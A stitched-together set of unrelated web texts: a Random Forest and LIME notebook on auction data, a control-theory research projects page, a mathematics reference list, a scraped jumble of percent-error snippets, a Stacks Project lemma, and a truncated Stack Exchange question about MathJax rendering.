6.000000 31.000000 0.800000 10100.000000 0.000000 75% 1.026710 10.702703 60.000000 0.900000 13674.104112 0.000000 max 1.617087 36.000000 516.000000 1.000000 30198.234375 1.000000 ## Modelling RoR¶ The purpose of this notebook is to use a learning algorithm that is capable of modeling non-linearities between the input (independent) variables (or features), such as a Random Forest, and then to apply the LIME algorithm to identify the key drivers of the output for any particular Out-Of-Sample (OOS) instance. ### Data Preparation Pipeline¶ We need to setup a data preparation pipeline for handling the systematic selection of features from the input DataFrame (and their mapping to a NumPy ndarray), creating a new factor variable to identify the presence/absence of starting bids (as the average is a bit too rough-and-dirty), and handling categorical data (via factorising). Note, that we haven't re-scaled the features as our intention is to use Random Forests to capture the non-linearities in the dataset, which do not benefit from any re-scaling process. In [6]: from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.preprocessing import StandardScaler, LabelEncoder, FunctionTransformer # helper functions def cat_col_selector(df): df_cat = df.select_dtypes(include=['object']) return df_cat.values def num_col_selector(df): df_num = df.select_dtypes(exclude=['object']) return df_num.values def cat_col_str2fact(X): fact_cols = [LabelEncoder().fit_transform(col) for col in X.T] fact_mat = np.vstack(fact_cols) return fact_mat.T def cat_col_fact_names(df): def list_of_fact_names(col): fact_names = LabelEncoder().fit(col).classes_ return fact_names df_cat = df.select_dtypes(include=['object']) X = df_cat.values fact_name_cols = [(col_name, list_of_fact_names(col)) for col_name, col in zip(df_cat.columns, X.T)] return dict(fact_name_cols) def make_new_features(df): start_bid_map = lambda x: 'start_bids_true' if x > 0 else 'start_bids_false' new_df = (df .assign(start_bids=df['avg_start_bid'].apply(start_bid_map)) .drop(['avg_start_bid'], axis=1)) return new_df # pipline for features ivar_data_pipe = Pipeline([ ('make_new_features', FunctionTransformer(make_new_features, validate=False)), ('union', FeatureUnion([ ('num_features', Pipeline([ ('get_num_features', FunctionTransformer(num_col_selector, validate=False)) ])), ('cat_vars', Pipeline([ ('get_cat_features', FunctionTransformer(cat_col_selector, validate=False)), ('factorise', FunctionTransformer(cat_col_str2fact, validate=False)) ])) ])) ]) # get feature names num_feature_names = ( make_new_features(model_data[model_features]) .select_dtypes(exclude=['object']) .columns .tolist()) cat_feature_names = ( make_new_features(model_data[model_features]) .select_dtypes(include=['object']) .columns .tolist()) all_feature_names = num_feature_names + cat_feature_names # get levels for categorical data cat_col_levels = cat_col_fact_names(make_new_features(model_data[model_features])) # perform transformations y = (model_data ['RoR'] .values .reshape(-1, )) X = (ivar_data_pipe .fit_transform(model_data[model_features])) X_df = pd.DataFrame(X, columns=all_feature_names) Out[6]: BPL lots product_types avg_reserve auction_mech country start_bids 0 11.066667 45.0 0.822222 22090.283008 0.0 24.0 0.0 1 7.000000 4.0 1.000000 9593.157715 0.0 5.0 1.0 2 17.464286 28.0 0.857143 16195.701695 0.0 8.0 0.0 3 11.487179 39.0 0.820513 8733.333333 0.0 8.0 0.0 4 1.000000 44.0 0.750000 6531.818182 1.0 8.0 0.0 ### Partition Data into Test and Train Sets¶ In [7]: from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 42) print('{} samples in training dataset and {} samples in test dataset' .format(X_train.shape[0], X_test.shape[0])) 4464 samples in training dataset and 1117 samples in test dataset For the test DataFrame only, we map the categorical feature levels to actual (string) categories to make it easier to read when testing LIME later on. In [19]: training_instances = pd.DataFrame( np.hstack((y_test.reshape(-1, 1), X_test)), columns=['RoR'] + all_feature_names) training_instances['auction_mech'] = ( training_instances['auction_mech'] .apply(lambda e: cat_col_levels['auction_mech'][int(e)])) training_instances['country'] = ( training_instances['country'] .apply(lambda e: cat_col_levels['country'][int(e)])) training_instances['start_bids'] = ( training_instances['start_bids'] .apply(lambda e: cat_col_levels['start_bids'][int(e)])) ### Define Experimental Setup¶ We will use RMSE as a test metric and 5-fold cross validation to get a basic estimate of the model's performance out-of-sample. In [9]: from sklearn.model_selection import cross_val_score from sklearn.metrics import mean_squared_error def rmse(model_fit, features, labels): predictions = model_fit.predict(features) rmse = np.sqrt(mean_squared_error(labels, predictions)) print('in-sample RMSE = {}'.format(rmse)) return None def cv_results(model_fit, features, labels): scores = cross_val_score(model_fit, features, labels, scoring='neg_mean_squared_error', cv=5) cv_mean_rmse = np.sqrt(-scores).mean() cv_std_rmse = np.sqrt(-scores).std() print('xross-Val RMSE = {} +/- {}'.format(cv_mean_rmse, cv_std_rmse)) return None ### Estimate Random Forest Regression Model¶ We have chosen to estimate a Random Forest model as the 'black box' model, on which we will apply the LIME algorithm to derive insights into what features are the most important for explaining a particular instance. We appreciate that Random Forests are not truly 'black box' models (e.g. when compared against a neural network), as it is possible to extract 'relative feature importance' via a number of ancillary algorithms - for example by computing the expected fraction of samples that using a particular feature will impact, via splitting samples in an internal node. This is not, however, as useful a measure as the coefficient of regression in a linear model (which can also capture effect magnitudes as well as relative importance, and are not fully deterministic). Regardless, we see this as a benefit, as we then have the chance to compare LIME's output with the Random Forest's expected relative variable importances. We start by using the default Random Forest regression parameters as implemented in Scikit-Learn, estimating the model on the training data, and running our cross-validation experiment to get an idea of how much over-fitting we can expect and what out-of-sample performance we can anticipate. In [10]: from sklearn.ensemble import RandomForestRegressor forest_reg = RandomForestRegressor(n_jobs=2, random_state=42) forest_reg.fit(X_train, y_train) rmse(forest_reg, X_train, y_train) cv_results(forest_reg, X_train, y_train) in-sample RMSE = 0.043177262592097386 xross-Val RMSE = 0.10006108388998118 +/- 0.007050697254328054 We now apply a grid search to find the best set of hyper-parameters. In [11]: from sklearn.model_selection import GridSearchCV # configure grid search forest_reg_param_grid = [{ 'bootstrap': [True, False], 'n_estimators': [20, 40], 'max_features': [3, 5, 7], 'min_samples_split': [2, 4, 8, 16], 'random_state' : [42]}] forest_reg_grid = GridSearchCV( forest_reg, forest_reg_param_grid, cv=5, scoring='neg_mean_squared_error', n_jobs=2, return_train_score=True) # fit grid search forest_reg_grid.fit(X_train, y_train) # print results print('best CV score: {}'.format(np.sqrt(-forest_reg_grid.best_score_))) print('\n------------------------') print('best parameters on grid:') print('------------------------') for k, v in forest_reg_grid.best_params_.items(): print('{0}: {1}'.format(k, v)) print('------------------------') best CV score: 0.0963582247413044 ------------------------ best parameters on grid: ------------------------ bootstrap: True max_features: 5 min_samples_split: 8 n_estimators: 40 random_state: 42 ------------------------ We now use the best-fit model to score the test dataset. In [12]: predicted = forest_reg_grid.best_estimator_.predict(X_test) error = predicted - y_test abs_error = np.absolute(error) model_performance = pd.DataFrame( np.concatenate([predicted.reshape((-1, 1)), y_test.reshape((-1, 1)), error.reshape((-1, 1)), abs_error.reshape((-1, 1))], axis=1), columns=['predicted', 'actual', 'error', 'abs_error']) print('In-sample RMSE = {}'.format(np.sqrt(np.mean(error ** 2)))) _ = (model_performance .plot(kind='scatter', x='predicted', y='actual', alpha=0.1, xlim=[0, 2], ylim=[0, 2])) In-sample RMSE = 0.08751609140478654 We now take a look at the distribution of errors (i.e. the residuals). In [13]: _ = plt.hist(error, density=True, bins=50, histtype='bar') We can see from the model's performance OOS, as illustrated in the above two plots, that it does a 'reasonable' job of predicting RoR, with the main sources of error coming predominantly from a small collection of poor predictions ## Model Interpretation using LIME¶ Now that we have estimated our model and have some insight into its expected performance, we turn our attention to applying the LIME algorithm to get deeper insight into the specific features that were key in driving the prediction for a particular instance of input data (e.g. from our test dataset). At a high-level, the LIME algorithm for a regression task performs the following steps: 1. simulate artificial test instances, using Normal distributions for continuous variables and empirical distributions for categorical variables. Note, that continuous variables can be discretised and treated as categorical variables (we have chosen this approach, based on quartiles); 2. using an exponential (Gaussian) kernel with 'width' (variance) equal to sqrt(number of columns) * 0.75, generate a set of weights for each artificial test instance; and, 3. estimate a linear regression model, using the weighted artificial training instances. If the number of variables are less-than-or-equal to 6, then one model for every possible combination of factors is estimated, to find the top N features that have the greatest predictive power for explaining the global model's prediction (by brute-force). If there are more than 6 variables, then a lasso regression is used and the hyper-parameter (the magnitude of the regularisation term) is tuned to yield the chosen number of explanatory variables. ### Setup LIME Algorithm¶ In [15]: from lime.lime_tabular import LimeTabularExplainer categorical_feature_maps = dict([ (n, e[1]) for n, e in zip(range(4, 7), cat_col_levels.items())]) explainer = LimeTabularExplainer( X_train, feature_names=all_feature_names, class_names=['RoR'], categorical_features=np.arange(4, 7), categorical_names=categorical_feature_maps, verbose=True, mode='regression', feature_selection='auto', discretize_continuous=True, discretizer='quartile', random_state=42) ### Explore Key Features in Instance-by-Instance Predictions¶ Start by choosing an instance from the test dataset (we have reproduce the entire set of training data instances in the Appendix, below, for reference). In [16]: training_data_instance_number = 10 Use LIME to estimate a local model to use for explaining our model's predictions. The outputs will be: 1. the intercept estimated for the local model; 2. the local model's estimate for the Regression Forest's prediction; and, 3. the Regression Forest's actual prediction. Note, that the actual value from the training data does not enter into this - the idea of LIME is to gain insight into why the chosen model - in our case the Random Forest regressor - is predicting whatever it has been asked to predict. Whether or not this prediction is actually any good, is a separate issue. In [17]: i = training_data_instance_number explanation = explainer.explain_instance( X_test[i], forest_reg_grid.best_estimator_.predict, num_features=5) Intercept 1.0191330793569726 Prediction_local [0.98157252] Right: 0.9957654428132873 Print the DataFrame row for the chosen test instance. In [20]: training_instances.loc[[i]] Out[20]: RoR BPL lots product_types avg_reserve auction_mech country start_bids 10 0.895324 6.933333 95.0 0.715789 18753.378947 auction_mech_SealedBid country_FR start_bids_false Now take a look at LIME's interpretation of our Random Forest's prediction. In [21]: explanation.show_in_notebook(show_table=True)
# Projects Consensus is a scenario where multiple agents interact with each other to converge asymptotically towards a common value. In recent times, convergence analysis of consensus protocols has drawn significant research attention among control researchers. However a large part of convergence analysis is based on a time-invariant graph structure. Our work [1], provides bounds on the convergence rates to consensus that hold for a large class of time-varying edge weights. A novel analysis approach based on classical notions of persistence of excitation and uniform complete observability has been developed. Furthermore in [2], a novel application of results from Ramsey theory allows for proof of consensus and convergence rate estimation under a switching graph topology. Sample spanning tree graphs and the corresponding convergence of spanning tree edges to consensus along with a rate envelope are shown below. Event-triggered control is a new paradigm where discretization of control, instead of being periodic is allowed to be state-dependent and activated via a trigger function. This is seen as an energy efficient means of control design. In [10], we investigate the affects of event-triggered control on consensus under switching graph networks and double-integrator agent models. This extends earlier work that assumes static network models. ifac_poster.pdf Orientation (Attitude) and position control of spacecraft are a key component of mission objectives for all space missions. Attitude control is primarily used to ensure that pointing requirements of sensors, solar arrays and other science equipment are satisfied. Synchronisation of multiple spacecraft in orbit is vital for interferometry applications among others. Our group's work proposes several feedback laws to ensure precise position formation and attitude synchronisation for cooperative applications. The novelty of our results with relation to literature is two-fold, i) we design coordinate free control making use of the rotation matrix directly in design, ii) the control laws require only line of sight measurements which are easily available and not dependent on absolute attitude measurement. Line-of-sight based control laws for attitude alignment along line-of-sight and formation keeping of two spacecraft in formation are proposed in [3]. The control objective is to achieve, attitude alignment about the LOS vector between the two spacecraft and a desired relative distance between the spacecraft. Proposed control laws are distributed in nature and are obtained in respective body frames. Desired equilibrium configuration under closed loop dynamics are shown to be locally asymptotically stable with a conservative region of attraction specified. The work is extended in [2] to complete attitude synchronization and formation keeping of two spacecraft with a leader using line-of-sight measurements. Each spacecraft measures line-of-sight unit vectors to each other and to the leader spacecraft in respective body frames. These line-of-sight measurements are communicated to each other. Lyapunov-like stability analysis is used to prove stability of the desired equilibrium configuration under closed loop dynamics. The work is further extended to relative attitude trajectory tracking using line-of-sight measurements in [5], [6], and [7], where the objective is to control attitudes of the spacecraft so that their relative attitude tracks a desired time-varying relative attitude trajectory. In [5] a distributed architecture is followed, while in [6] and [7] serial communication architecture are followed. The attitude control laws are obtained in terms of line-of-sight vectors and guarantee asymptotic tracking of desired attitude trajectories even in the presence of spacecraft translation dynamics under gravity. No observations to external objects such as stars are used, which typically require expensive sensor equipment and complex on-board computation algorithms. The rotation matrix is a global representation of attitude and therefore precludes the possibility of winding like phenomena typical with parametrizations affecting uniqueness of solutions. Further, line of sight based control laws minimize the need for expensive star sensors and associated computation for absolute attitude estimation. The results in [3]-[7], therefore have great utility in micro-satellite based multiple spacecraft missions. Coverage control refers to design of feedback laws for multiple robotic agents to optimally cover a convex region of interest. The region is typically of interest in this context due to unfolding of a phenomena that requires distributed sensing, such as an oil spill, nuclear radiation etc. Optimal coverage control involves distributing agents in the region based on the intensity of the sensory function. The centroidal Voronoi configuration has been shown in literature to be optimal in such applications. Our research extends literature in several ways, i) we consider dynamics level model instead of kinematics as in literature for more accurate depiction of a real system, ii) we adapt for unknowns in the dynamics, such as inertia in addition to the sensory function as in literature to allow for uncertainties [8]. The following plots show sample initial and final positions using our coverage strategy with large peaks indicated by solid red dot and small peaks by hollow red dots. In the above experimental investigations, the coverage control algorithms designed by us are applied to mobile ground robots. The phenomenon is the light generated by two LED's, one brighter and another dimmer. Two different algorithms were arrived at, the top video shows results based on the locational optimisation framework and the bottom video shows the results based on an $L_2$ minimisation of the distance between sensor and light densities. In both cases we notice that more robots settle closer to the higher intensity light as expected. Energy efficiency has emerged as one of the key challenges in recent times for all applications. Event-triggered control is also seen as a means to minimize actuation in control systems. $L_0$ optimal control offers a natural way to design sparse controllers for dynamical systems. In contrast to $L_1$ optimal control laws in literature, the control magnitudes are precisely zero and not `close' to zero. The minimization is on the activation time. We have studied both the reachability and linear quadratic problems in this framework to obtain sparse controls for the same [9]. A comparison between the performance of the LQ optimal control and the discontinuous $L_0$ optimal control is shown below. Gazebo simulation of the Backstepping law on an AR Drone model Initial Hardware trial of the Backstepping law on the AR Drone AR Drone following an RC car using a Back-stepping algorithm [1] N. Roy Chowdhury and S. Sukumar, “Persistence based analysis of consensus protocols for dynamic graph networks,” in the proceedings of European Control Conference (ECC), 2014, pp. 886-891. [2] N. R. Chowdhury, S. Sukumar, and N. Balachandran, “Persistence based convergence rate analysis of consensus protocols for dynamic graph networks.” European Journal of Control, 2016. [3] Warier, R. and Sinha, A., “LOS based attitude alignment of two spacecraft in formation,” 5th International Conference of Spacecraft Formation Flying Missions and Technologies, Munich, 2013. [4] Warier, R., Sinha, A. and Srikant, S., “Spacecraft Attitude Synchronization And Formation Keeping Using Line Of Sight Measurements,” Proceedings of 19th IFAC World Congress, Cape Town, 2014. [5] Warier, R., Sinha, A. and Srikant, S., “Relative Attitude Trajectory Tracking Using Line of Sight Measurements under Spacecraft Position Dynamics,” Advances in Control and Optimization of Dynamical Systems, Vol.3, No. 1, 2014, pp.455-461. doi: 10.3182/20140313-3-IN-3024.00236 [6] Warier, R., Sinha, A. and Srikant, S., “Line Of Sight Based Spacecraft Formation Control Under Gravity,” Indian Control Conference, Chennai, 2015. [7] Warier, R., Sinha, A. and Srikant, S., “Line-of-sight Based Attitude and Position Tracking Control For Spacecraft Formation,” European Journal of Control, 2016. doi: 10.1016/j.ejcon.2016.04.001 [8] Razak R. A. , Srikant S. and Chung H., “Decentralized Adaptive Coverage Control of Nonholonomic Mobile Robots” , 10th IFAC Symposium on Nonlinear Control Systems (NOLCOS 2016), August 23-25, 2016 [9] Srikant S. and Chatterjee D., “A jammer's perspective of reachability and LQ optimal control”, Automatica , Vol. 70, August 2016, Pages 295–302 [10] S. Arun Kumar, N. R. Chowdhury, S. Srikant, J. Raisch, “Consensus Analysis of Systems with Time-varying interactions: An Event-triggered Approach”, 20th IFAC World Congress, Toulouse, France, July 2017
# Proofs Without Words - References - Acknowledgments - About the Authors Author(s): Tim Doyle (Whitman College), Lauren Kutler (Whitman College), Robin Miller (Whitman College), and Albert Schueller (Whitman College) ### References 1. Alsina, Claudi, and Roger B. Nelsen. Math Made Visual: Creating Images for Understanding Mathematics. Washington, DC: Mathematical Association of America, 2006. 2. Alsina, Claudi, and Roger B. Nelsen. When Less Is More: Visualizing Basic Inequalities. Washington, D.C.: Mathematical Association of America, 2009. 3. Boyer, Carl B., A History of Mathematics (2nd edition), John Wiley & Sons, Inc., 1991. 4. Burge, T., "Frege on Knowing the Foundation," Mind, Vol. 107, No. 426 (1998), pp. 305-347. 5. Burge, T., Truth Thought Reason: Essays on Frege, Oxford University Press, 2005. 6. Byrne, Oliver, The first six books of the Elements of Euclid, in which coloured diagrams and symbols are used instead of letters for the greater ease of learners. London: W. Pickering, 1847. 7. Cooke, Roger, "The Mathematics of the Hindus," The History of Mathematics: A Brief Course, Wiley-Interscience, pp. 213-215, 1997. 8. Doyle, Timothy, "The Mathematical Content of Meno 82b-85b," Draft manuscript, presented at the Northwest Philosophy Conference, Pacific University, October 2013. 9. Dummett, Michael, Frege: Philosophy of Mathematics, Harvard University Press, 1991. 10.  Fredrickson, George, Dissections: Plane & Fancy, Cambridge University Press, 1997. 11.  Frege, Gottlob. The Foundations of Arithmetic: A Logico-mathematical Enquiry into the Concept of Number. Evanston, IL: Northwestern UP, 1980. 12. Fry, Alan L., "Sum of Cubes," Mathematics Magazine, Vol. 58, No. 1 (1985), p. 11. 13. Gallant, Charles D., "A Truly Geometric Inequality," Mathematics Magazine, Vol. 50, No. 2 (1977), p. 98. 14. Gerstein, Larry J., Introduction to Mathematical Structures and Proofs, Springer Publishing, 1996. 15. Goodfriend, Jason, Gateway to Higher Mathematics, Jones and Bartlett Learning, 2005. 16.  Gossett, Eric, Discrete Mathematics With Proof, John Wiley and Sons, 2009. 17. Isaacs, Rufus, "Two Mathematical Papers without Words," Mathematics Magazine, Vol. 48, No. 4 (Sep., 1975), p. 198. 18.  Katz, Victor J., A History of Mathematics, Harper-Collins, 1993. 19. Kawasaki, Ken-ichiroh, "Viviani's Theorem," Mathematics Magazine, Vol. 78, No. 3 (2005), p. 213. 20. Kung, Sidney H., "The Law of Cosines," Mathematics Magazine, Vol. 63, no. 5 (1990), p. 342. 21.  Lakatos, Imre. Proofs and Refutations: The Logic of Mathematical Discovery. Cambridge: Cambridge UP, 1976. 22. Lucas, John F., Introduction to Abstract Mathematics (2nd edition), Ardley House Publishers, 1990. 23. Mabry, Rick, "Proof Without Words: $(1/4) + (1/4)^2 + (1/4)^3 + \cdots = 1/3,"$ Mathematics Magazine, Vol. 72, no. 1 (1999), p. 63. 24. Morash, Ronald P., Bridge to Abstract Mathematics: Mathematical Proof and Structures (2nd edition), McGraw Hill, 1991. 25. "News and Letters," Mathematics Magazine, Vol. 49, No. 1 (Jan., 1976), pp. 49-52. 26. Nelsen, Roger B., Interview with Robin Miller, March 23, 2012. 27. Nelsen, Roger B., "Proof without Words: The Harmonic Mean - Geometric Mean - Arithmetic Mean - Root Mean Square Ineqality," Mathematics Magazine, Vol. 60, No. 3 (June, 1987), p. 158. 28. Nelsen, Roger B. Proofs without Words: Exercises in Visual Thinking. Washington, D.C.: Mathematical Association of America, 1993. 29. Nelsen, Roger B. Proofs without Words II: More Exercises in Visual Thinking. Washington, DC: Mathematical Association of America, 2000. 30. Plato, Meno (2nd edition), G.M.A. Grube, translator, Hackett, 1976. 31. Romaine, William, "(no title)," Mathematics Magazine, Vol. 61, No. 2 (1988), p. 113. 32. Siu, Man-Keung, Personal email to Albert Schueller, June 10, 2014. 33. Siu, Man-Keung, "Proof without Words: Sum of Squares," Mathematics Magazine, Vol. 57, No. 2 (1984), p. 92. 34. Steen, Lynn A., Personal email to Robin Miller, April 20, 2012. 35. Steiner, Mark, "Mathematical Proof" in Philosophy of Mathematics: An Anthology, ed. Dale Jacquette, Blackwell Publishers, 2002. 36. Swetz, Frank J. and Katz, Victor J., "Mathematical Treasures - Oliver Byrne's Euclid," Loci: Convergence (January 2011). 37. Wolf, Robert S., Proof, Logic, and Conjecture: The Mathematician's Toolbox, W.H. Freeman and Company, 1998. 38. Wolf, Samuel, "(No title)," Mathematics Magazine, Vol. 62, no. 3 (1989), p. 190. 39. Yates, Robert C., "The Trisection Problem," National Mathematics Magazine, Vol. 15, no. 6 (1941), pp. 278-293. ### Acknowledgments The authors wish to thank Moira Gresham, a member of the Department of Physics at Whitman College, and E. Sonny Elizondo, a member of the Department of Philosophy at UC Santa Barbara, for their thoughtful feedback on this paper.
Address 2335 4th Ave E, Big Stone Gap, VA 24219 (276) 220-6412 # calculating percentage error physics Dungannon, Virginia The amount of drift is generally not a concern, but occasionally this source of error can be significant and should be considered. Real science has to find a way to quantify precision and uncertainty without reference to a predetermined correct value. –dmckee♦ Oct 24 '14 at 0:49 add a comment| 1 Answer 1 Can someone explain what is correct way and more importantly, why? Optimise Sieve of Eratosthenes How are solvents chosen in organic reactions? If you're testing an experiment against theory, there's no way to know whether a 0.03% difference is consistent with the theory or inconsistent with it, because it depends on how much Ignore any minus sign. Percentage is always positive, so we invoke absolute value to get $$E=\frac{|A-B|}{B}\times 100$$ Actually, we can also use $$E=\frac{|B-A|}{B}\times 100$$ Percent error is always taken with respect to the known quantity How much should I adjust the CR of encounters to compensate for PCs having very little GP? Home About wikiHow Jobs Terms of Use RSS Site map Log In Mobile view All text shared under a Creative Commons License. The percentage error in measurement of time period "T"and length "L" of a simple pendulum are 0.2% and 2% respectively ,the maximum % age error in LT2 is? With this method, problems of source instability are eliminated, and the measuring instrument can be very sensitive and does not even need a scale. Answer this question Flag as... Create an account EXPLORE Community DashboardRandom ArticleAbout UsCategoriesRecent Changes HELP US Write an ArticleRequest a New ArticleAnswer a RequestMore Ideas... The term "human error" should also be avoided in error analysis discussions because it is too general to be useful. The experimenter may measure incorrectly, or may use poor technique in taking a measurement, or may introduce a bias into measurements by expecting (and inadvertently forcing) the results to agree with Example: You measure the plant to be 80 cm high (to the nearest cm) This means you could be up to 0.5 cm wrong (the plant could be between 79.5 and Reference: UNC Physics Lab Manual Uncertainty Guide Advisors For Incoming Students Undergraduate Programs Pre-Engineering Program Dual-Degree Programs REU Program Scholarships and Awards Student Resources Departmental Honors Honors College Contact Mail Address:Department When Sudoku met Ratio Why is it "kiom strange" instead of "kiel strange"? Flag as... Email check failed, please try again Sorry, your blog cannot share posts by email. A high percent error must be accounted for in your analysis of error, and may also indicate that the purpose of the lab has not been accomplished. However, when I deal with nominal measurement, not the upper or lower limits, I would certainly say my nominal dimension has so much %error. Parallax (systematic or random) - This error can occur whenever there is some distance between the measuring scale and the indicator used to obtain a measurement. The difference between the actual and experimental value is always the absolute value of the difference. |Experimental-Actual|/Actualx100 so it doesn't matter how you subtract. Comparing Approximate to Exact "Error": Subtract Approximate value from Exact value. Since the experimental value is smaller than the accepted value it should be a negative error. Show more unanswered questions Ask a Question Submit Already answered Not a question Bad question Other If this question (or a similar one) is answered twice in this section, please click Chemistry Chemistry 101 - Introduction to Chemistry Chemistry Tests and Quizzes Chemistry Demonstrations, Chemistry Experiments, Chemistry Labs & Chemistry Projects Periodic Table and the Elements Chemistry Disciplines - Chemical Engineering and Also, Wikipedia (not the best source, I know) and Wolfram indicate division by $B$,as does this page. –HDE 226868 Oct 22 '14 at 1:30 @BenCrowell I know from your The absolute value of a positive number is the number itself and the absolute value of a negative number is simply the value of the number without the negative sign, so Reply ↓ Todd Helmenstine Post authorJanuary 28, 2016 at 2:15 pm Thanks for pointing that out. Simply divide -1, the result when 10 is subtracted from 9, by 10, the real value. Approximate Value − Exact Value × 100% Exact Value Example: They forecast 20 mm of rain, but we really got 25 mm. 20 − 25 25 × 100% = −5 25 Reply ↓ Mary Andrews February 27, 2016 at 5:39 pm Percent error is always represented as a positive value. Can I compost a large brush pile? Just add the percentage symbol to the answer and you're done. Yes No Can you tell us more? The absolute value of a number is the value of the positive value of the number, whether it's positive or negative. Doing so often reveals variations that might otherwise go undetected. Please select a newsletter. As a rule, gross personal errors are excluded from the error analysis discussion because it is generally assumed that the experimental result was obtained by following correct procedures. The best way to account for these sources of error is to brainstorm with your peers about all the factors that could possibly affect your result. All Rights Reserved. If I want to measure millimeter dimension with an instrument with micron resolution. Clemson University. You measure the sides of the cube to find the volume and weigh it to find its mass. There is no particular reason to prefer division by A or by B in general, and it is not true that we don't care about the sign. View text only version Skip to main content Skip to main navigation Skip to search Appalachian State University Department of Physics and Astronomy Labs - Error Analysis In most labs, you EDIT Edit this Article Home » Categories » Education and Communications » Subjects » Mathematics » Probability and Statistics ArticleEditDiscuss Edit ArticleHow to Calculate Percentage Error Community Q&A Calculating percentage error If you need to know positive or negative error, this is done by dropping the absolute value brackets in the formula. In most cases, absolute error is fine. For instance, we may use two different methods to determine the speed of a rolling body. For instance, a meter stick cannot distinguish distances to a precision much better than about half of its smallest scale division (0.5 mm in this case). It is often used in science to report the difference between experimental values and expected values.The formula for calculating percent error is:Note: occasionally, it is useful to know if the error Share it. Yes No Not Helpful 2 Helpful 4 Unanswered Questions How can I find the value of capital a-hypothetical? I would certainly specify tolerance as my measuring device will have inherent inaccuracy. Popular Pages: Infant Growth Charts - Baby PercentilesTowing: Weight Distribution HitchPercent Off - Sale Discount CalculatorMortgage Calculator - Extra PaymentsSalary Hourly Pay Converter - JobsPaycheck Calculator - Overtime RatePay Raise Increase Please enter a valid email address. Thanks, You're in! If the observer's eye is not squarely aligned with the pointer and scale, the reading may be too high or low (some analog meters have mirrors to help with this alignment). Percent error or percentage error expresses as a percentage the difference between an approximate or measured value and an exact or known value. Random errors can be reduced by averaging over a large number of observations. Percentage Difference Percentage Index Search :: Index :: About :: Contact :: Contribute :: Cite This Page :: Privacy Copyright © 2014 MathsIsFun.com AJ Design☰ MenuMath GeometryPhysics ForceFluid MechanicsFinanceLoan Calculator Percent Please select a newsletter. The theoreticalvalue (using physics formulas)is 0.64 seconds. Lag time and hysteresis (systematic) - Some measuring devices require time to reach equilibrium, and taking a measurement before the instrument is stable will result in a measurement that is generally How to solve percentage error without the exact value given? so divide by the exact value and make it a percentage: 65/325 = 0.2 = 20% Percentage Error is all about comparing a guess or estimate to an exact value. Reply ↓ Leave a Reply Cancel reply Search for: Get the Science Notes Newsletter Get Projects Free in Email Top Posts & Pages Printable Periodic Tables Electrolytes -- Strong, Weak, and Why was the Rosetta probe programmed to "auto shutoff" at the moment of hitting the surface? Photo's Courtesy Corel Draw. About Todd HelmenstineTodd Helmenstine is the physicist/mathematician who creates most of the images and PDF files found on sciencenotes.org.
Lemma 70.4.7. Let $S$ be a scheme. Let $\xymatrix{ X' \ar[d]_{f'} \ar[r]_{g'} & X \ar[d]^ f \\ Y' \ar[r]^ g & Y }$ be a cartesian diagram of algebraic spaces over $S$. Let $\mathcal{F}$ be a quasi-coherent $\mathcal{O}_ X$-module and set $\mathcal{F}' = (g')^*\mathcal{F}$. If $f$ is locally of finite type, then 1. $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}') \Rightarrow g'(x') \in \text{Ass}_{X/Y}(\mathcal{F})$ 2. if $x \in \text{Ass}_{X/Y}(\mathcal{F})$, then given $y' \in |Y'|$ with $f(x) = g(y')$, there exists an $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}')$ with $g'(x') = x$ and $f'(x') = y'$. Proof. This follows from the case of schemes by étale localization. We write out the details completely. Choose a scheme $V$ and a surjective étale morphism $V \to Y$. Choose a scheme $U$ and a surjective étale morphism $U \to V \times _ Y X$. Choose a scheme $V'$ and a surjective étale morphism $V' \to V \times _ Y Y'$. Then $U' = V' \times _ V U$ is a scheme and the morphism $U' \to X'$ is surjective and étale. Proof of (1). Choose $u' \in U'$ mapping to $x'$. Denote $v' \in V'$ the image of $u'$. Then $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}')$ is equivalent to $u' \in \text{Ass}(\mathcal{F}|_{U'_{v'}})$ by definition (writing $\text{Ass}$ instead of $\text{WeakAss}$ makes sense as $U'_{v'}$ is locally Noetherian). Applying Divisors, Lemma 31.7.3 we see that the image $u \in U$ of $u'$ is in $\text{Ass}(\mathcal{F}|_{U_ v})$ where $v \in V$ is the image of $u$. This in turn means $g'(x') \in \text{Ass}_{X/Y}(\mathcal{F})$. Proof of (2). Choose $u \in U$ mapping to $x$. Denote $v \in V$ the image of $u$. Then $x \in \text{Ass}_{X/Y}(\mathcal{F})$ is equivalent to $u \in \text{Ass}(\mathcal{F}|_{U_ v})$ by definition. Choose a point $v' \in V'$ mapping to $y' \in |Y'|$ and to $v \in V$ (possible by Properties of Spaces, Lemma 65.4.3). Let $t \in \mathop{\mathrm{Spec}}(\kappa (v') \otimes _{\kappa (v)} \kappa (u))$ be a generic point of an irreducible component. Let $u' \in U'$ be the image of $t$. Applying Divisors, Lemma 31.7.3 we see that $u' \in \text{Ass}(\mathcal{F}'|_{U'_{v'}})$. This in turn means $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}')$ where $x' \in |X'|$ is the image of $u'$. $\square$ In your comment you can use Markdown and LaTeX style mathematics (enclose it like $\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar). Unfortunately JavaScript is disabled in your browser, so the comment preview function will not work. In order to prevent bots from posting comments, we would like you to prove that you are human. You can do this by filling in the name of the current tag in the following input field. As a reminder, this is tag 0CV2. Beware of the difference between the letter 'O' and the digit '0'.
# Why does MathJax not render in comments on the mobile app? [duplicate] I sometimes read SX stuff from the app on my android. Today, I found myself reading a question from Math.SX. To my surprise, after a while, I noticed a problem in the comments, which this screenshot records: (Click image to enlarge) If you are curious about the question, it is this one. Anyway, as you can see (hopefully the image is not too small, but the dollars seem pretty visible to me) MathJax is not rendered in those comments. THis is very bad, because in this case there isn't this much of complications, and besides, I am very accustomed to LaTeX, but imagine something far more complex (integrals with limits, sums, or the likes) with a user whose LaTeX is bad or not exercised: the comments, thus unrendered, become unreadable. So why is MathJax not rendered in comments whereas it is in the question? And why does this only happen in the app, not the site? Addendum Is there a more "logical" way of reducing the image besides copying the HTML code from this answer, code placed there by Firelord in an edit, every time I post a screenshot and it is terribly huge? To be extra-clear: this is NOT the question. I'm adding this sentence because it has happened to me that I asked a question, then faced a formating problem while posting it and asked about it as an extra, like here, and got faced with answers addressing only the extra. Please don't. Update: Yes, the question this has been marked a duplicate of (i.e. this one) is strongly related to it. However, as the titles already show, they are not the same. It is interesting to know this is 